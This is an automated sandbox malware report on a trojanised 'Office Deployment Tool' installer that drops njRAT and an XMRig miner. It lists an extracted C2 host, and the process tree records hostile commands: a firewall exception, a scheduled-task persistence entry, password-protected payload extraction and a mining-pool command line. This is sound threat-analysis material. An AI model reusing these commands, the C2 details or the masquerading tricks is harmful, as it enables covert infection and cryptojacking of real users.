Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 149s
max time network: 154s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 01/02/2025, 17:48
Static task: static1
Behavioral task: behavioral1
  Sample: officedeploymenttool_18227-20162.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: officedeploymenttool_18227-20162.exe
  Resource: win10v2004-20250129-en
General
Target: officedeploymenttool_18227-20162.exe
Size: 37.5MB
MD5: d85711a9d52862c3e538d79217244059
SHA1: 3ed74e38b09b34db3add5fb2c1f4debb66651987
SHA256: b84d06eb8b490a54bdd252a58d25eb54f5580018ecbf3066e0cd5d03ef284c96
SHA512: 7858369ea6aead310ce6524699301958167914453e7d83849b62088e58c8ef318a75e14da637434340f15e01acbe623337a7d1a06e15ea18c3c32b15d8e843ae
SSDEEP: 786432:vhP/Hle221VnfaWCXcbWDMzISiBddts4s0ACgz27e6fg8/KQxg6U5SeE+nz2E:vBlVsCFhDMzwds4s0oZ+g8CQxfYX6
Malware Config
Extracted
Family: njrat
Version: 0.7d
Botnet: Cyka
C2: mj2025.ddns.net:5552
Mutex: c6c0c67fa02a1b5dbba63788457d850d
reg_key: c6c0c67fa02a1b5dbba63788457d850d
splitter: |'|'|
Signatures
- Njrat family
- Xmrig family
- XMRig Miner payload (2 IoCs)
  resource | yara_rule
  behavioral1/memory/3020-3175-0x0000000000210000-0x0000000000D21000-memory.dmp | xmrig
  behavioral1/memory/3020-3176-0x0000000000210000-0x0000000000D21000-memory.dmp | xmrig
- Modifies Windows Firewall (2 TTPs, 1 IoCs)
  pid | Process
  1836 | netsh.exe
- Drops startup file (2 IoCs)
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6c0c67fa02a1b5dbba63788457d850d.exe | GameSDK.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6c0c67fa02a1b5dbba63788457d850d.exe | GameSDK.exe
- Executes dropped EXE (17 IoCs)
  pid | Process
  1864 | svchost.exe
  2324 | svchost.exe
  2728 | Stable_Network.exe
  2860 | Runtime Broker.exe
  1180 | Process not Found
  2676 | CL_Debug_Log.txt
  648 | GameSDK.exe
  1500 | Antimalware Service Executable.exe
  2000 | Antimalware Service Executable.exe
  2344 | Antimalware Service Executable.exe
  1208 | Antimalware Service Executable.exe
  1136 | tor.exe
  2248 | Antimalware Service Executable.exe
  2616 | Antimalware Service Executable.exe
  1728 | Antimalware Service Executable.exe
  2688 | Antimalware Service Executable.exe
  2804 | Antimalware Service Executable.exe
- Loads dropped DLL (20 IoCs; identical adjacent rows collapsed, count shown as ×N)
  pid | Process
  2536 | officedeploymenttool_18227-20162.exe
  2324 | svchost.exe
  2536 | officedeploymenttool_18227-20162.exe (×3)
  1180 | Process not Found
  2728 | Stable_Network.exe
  2860 | Runtime Broker.exe (×2)
  1472 | taskeng.exe
  1088 | Process not Found
  2344 | Antimalware Service Executable.exe (×2)
  1136 | tor.exe (×6)
  2036 | Process not Found
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\c6c0c67fa02a1b5dbba63788457d850d = "\"C:\\Users\\Admin\\GameSDK.exe\" .." | GameSDK.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c6c0c67fa02a1b5dbba63788457d850d = "\"C:\\Users\\Admin\\GameSDK.exe\" .." | GameSDK.exe
- AutoIT Executable (3 IoCs)
  AutoIT scripts compiled to PE executables.
  resource | yara_rule
  behavioral1/files/0x00060000000171a8-30.dat | autoit_exe
  behavioral1/files/0x0005000000018683-78.dat | autoit_exe
  behavioral1/files/0x000d000000018676-81.dat | autoit_exe
- Suspicious use of SetThreadContext (3 IoCs)
  description | pid | Process | procid_target
  PID 2344 set thread context of 1208 | 2344 | Antimalware Service Executable.exe | 47
  PID 2344 set thread context of 2248 | 2344 | Antimalware Service Executable.exe | 51
  PID 2344 set thread context of 3020 | 2344 | Antimalware Service Executable.exe | 53
- UPX (yara_rule upx, 2 IoCs)
  resource | yara_rule
  behavioral1/files/0x0007000000016d5e-24.dat | upx
  behavioral1/memory/2324-26-0x000007FEF5540000-0x000007FEF59A6000-memory.dmp | upx
- Detects Pyinstaller (1 IoCs)
  resource | yara_rule
  behavioral1/files/0x0007000000012117-5.dat | pyinstaller
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description | ioc | Process
  Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | netsh.exe
  Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | netsh.exe
  Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | netsh.exe
- System Location Discovery: System Language Discovery (1 TTPs, 8 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Runtime Broker.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Stable_Network.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | CL_Debug_Log.txt
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | GameSDK.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | netsh.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | officedeploymenttool_18227-20162.exe
- NTFS ADS (2 IoCs)
  description | ioc | Process
  File opened for modification | C:\Users\Admin\AppData\Local\Temp\winmgmts:\CCJBVTGQ\root\CIMV2 | Stable_Network.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\CCJBVTGQ\root\CIMV2 | Antimalware Service Executable.exe
- Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2804 | schtasks.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs; identical rows collapsed, count shown as ×N)
  pid | Process
  2728 | Stable_Network.exe (×64)
- Suspicious use of AdjustPrivilegeToken (45 IoCs; identical adjacent rows collapsed, count shown as ×N; "33" and "35" are privilege LUIDs the report leaves unnamed)
  description | pid | Process
  Token: SeRestorePrivilege | 2676 | CL_Debug_Log.txt
  Token: 35 | 2676 | CL_Debug_Log.txt
  Token: SeSecurityPrivilege | 2676 | CL_Debug_Log.txt (×2)
  Token: SeRestorePrivilege | 1208 | Antimalware Service Executable.exe
  Token: 35 | 1208 | Antimalware Service Executable.exe
  Token: SeSecurityPrivilege | 1208 | Antimalware Service Executable.exe (×2)
  Token: SeDebugPrivilege | 648 | GameSDK.exe
  Token: 33 followed by Token: SeIncBasePriorityPrivilege | 648 | GameSDK.exe (pair ×5)
  Token: SeRestorePrivilege | 2248 | Antimalware Service Executable.exe
  Token: 35 | 2248 | Antimalware Service Executable.exe
  Token: SeSecurityPrivilege | 2248 | Antimalware Service Executable.exe (×2)
  Token: 33 followed by Token: SeIncBasePriorityPrivilege | 648 | GameSDK.exe (pair ×1)
  Token: SeLockMemoryPrivilege | 3020 | attrib.exe (×2)
  Token: 33 followed by Token: SeIncBasePriorityPrivilege | 648 | GameSDK.exe (pair ×9)
- Suspicious use of FindShellTrayWindow (14 IoCs; identical adjacent rows collapsed, count shown as ×N)
  pid | Process
  2728 | Stable_Network.exe (×3)
  2000 | Antimalware Service Executable.exe (×3)
  1500 | Antimalware Service Executable.exe (×3)
  2344 | Antimalware Service Executable.exe (×3)
  3020 | attrib.exe
  2616 | Antimalware Service Executable.exe
- Suspicious use of SendNotifyMessage (13 IoCs; identical adjacent rows collapsed, count shown as ×N)
  pid | Process
  2728 | Stable_Network.exe (×3)
  2000 | Antimalware Service Executable.exe (×3)
  1500 | Antimalware Service Executable.exe (×3)
  2344 | Antimalware Service Executable.exe (×3)
  2616 | Antimalware Service Executable.exe
- Suspicious use of WriteProcessMemory (64 IoCs; identical adjacent rows collapsed, count shown as ×N)
  description | pid | Process | procid_target
  PID 2536 wrote to memory of 1864 | 2536 | officedeploymenttool_18227-20162.exe | 30 (×4)
  PID 1864 wrote to memory of 2324 | 1864 | svchost.exe | 31 (×3)
  PID 2536 wrote to memory of 2728 | 2536 | officedeploymenttool_18227-20162.exe | 32 (×4)
  PID 2536 wrote to memory of 2860 | 2536 | officedeploymenttool_18227-20162.exe | 33 (×4)
  PID 2728 wrote to memory of 2676 | 2728 | Stable_Network.exe | 35 (×4)
  PID 2860 wrote to memory of 648 | 2860 | Runtime Broker.exe | 37 (×4)
  PID 2728 wrote to memory of 2824 | 2728 | Stable_Network.exe | 38 (×4)
  PID 2824 wrote to memory of 2804 | 2824 | cmd.exe | 40 (×4)
  PID 648 wrote to memory of 1836 | 648 | GameSDK.exe | 42 (×4)
  PID 1472 wrote to memory of 1500 | 1472 | taskeng.exe | 44 (×3)
  PID 1472 wrote to memory of 2000 | 1472 | taskeng.exe | 45 (×3)
  PID 2000 wrote to memory of 2344 | 2000 | Antimalware Service Executable.exe | 46 (×3)
  PID 2344 wrote to memory of 1208 | 2344 | Antimalware Service Executable.exe | 47 (×5)
  PID 2344 wrote to memory of 1136 | 2344 | Antimalware Service Executable.exe | 50 (×3)
  PID 2344 wrote to memory of 2248 | 2344 | Antimalware Service Executable.exe | 51 (×5)
  PID 2344 wrote to memory of 3020 | 2344 | Antimalware Service Executable.exe | 53 (×5)
  PID 1472 wrote to memory of 2616 | 1472 | taskeng.exe | 56 (×2)
- Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid | Process
  3020 | attrib.exe
Processes
(tree depth shown as [n]; each entry lists image path, command line, PID and the signatures that hit on it)

[1] C:\Users\Admin\AppData\Local\Temp\officedeploymenttool_18227-20162.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\officedeploymenttool_18227-20162.exe"
    PID: 2536
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Roaming\svchost.exe
      Command line: "C:\Users\Admin\AppData\Roaming\svchost.exe"
      PID: 1864
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Roaming\svchost.exe
        Command line: "C:\Users\Admin\AppData\Roaming\svchost.exe"
        PID: 2324
        - Executes dropped EXE
        - Loads dropped DLL
  [2] C:\ProgramData\Stable_Network.exe
      Command line: "C:\ProgramData\Stable_Network.exe"
      PID: 2728
      - Executes dropped EXE
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
        Command line: C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
        PID: 2676
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
        PID: 2824
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
          PID: 2804
          - System Location Discovery: System Language Discovery
          - Scheduled Task/Job: Scheduled Task
  [2] C:\Users\Admin\AppData\Roaming\Runtime Broker.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"
      PID: 2860
      - Executes dropped EXE
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\GameSDK.exe
        Command line: "C:\Users\Admin\GameSDK.exe"
        PID: 648
        - Drops startup file
        - Executes dropped EXE
        - Adds Run key to start application
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\netsh.exe
          Command line: netsh firewall add allowedprogram "C:\Users\Admin\GameSDK.exe" "GameSDK.exe" ENABLE
          PID: 1836
          - Modifies Windows Firewall
          - Event Triggered Execution: Netsh Helper DLL
          - System Location Discovery: System Language Discovery

[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {37ABD51F-7509-46CD-8CD4-DB3EC1CD530F} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
    PID: 1472
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck
      PID: 1500
      - Executes dropped EXE
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck
      PID: 2000
      - Executes dropped EXE
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
        Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck38142
        PID: 2344
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - NTFS ADS
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
          Command line: 7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
          PID: 1208
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
          Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
          PID: 1136
          - Executes dropped EXE
          - Loads dropped DLL
      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
          Command line: 7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
          PID: 2248
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\attrib.exe
          Command line: -o stratum+tcp://pool.supportxmr.com:3333 -u 428jMEBAdSKHQGHrnDMJzK16oJ1irAGkEgLZrhkJjNSxfsHQ8cpLn8QBAQWcpodf7bjFLt1wQHbJ8JNg3Em5EspB1MsE9zY -p x -t 4
          PID: 3020
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow
          - Views/modifies file attributes
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck
      PID: 1728
      - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck
      PID: 2616
      - Executes dropped EXE
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck
      PID: 2804
      - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
      Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck
      PID: 2688
      - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads